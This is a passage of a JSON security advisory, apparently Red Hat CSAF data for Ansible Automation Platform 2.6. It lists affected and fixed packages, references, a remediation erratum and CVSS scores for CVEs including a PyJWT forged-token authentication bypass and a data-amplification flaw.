"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48526"
},
{
"category": "external",
"summary": "RHBZ#2482734",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482734"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48526",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48526"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48526",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48526"
},
{
"category": "external",
"summary": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx"
}
],
"release_date": "2026-05-28T15:09:09.258000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:56:41+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50336"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pyjwt: PyJWT: Authentication bypass due to forged JSON Web Tokens"
},
{
"cve": "CVE-2026-54059",
"cwe": {
"id": "CWE-409",
"name": "Improper Handling of Highly Compressed Data (Data Amplification)"
},
"discovery_date": "2026-07-06T20:02:21.640821+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
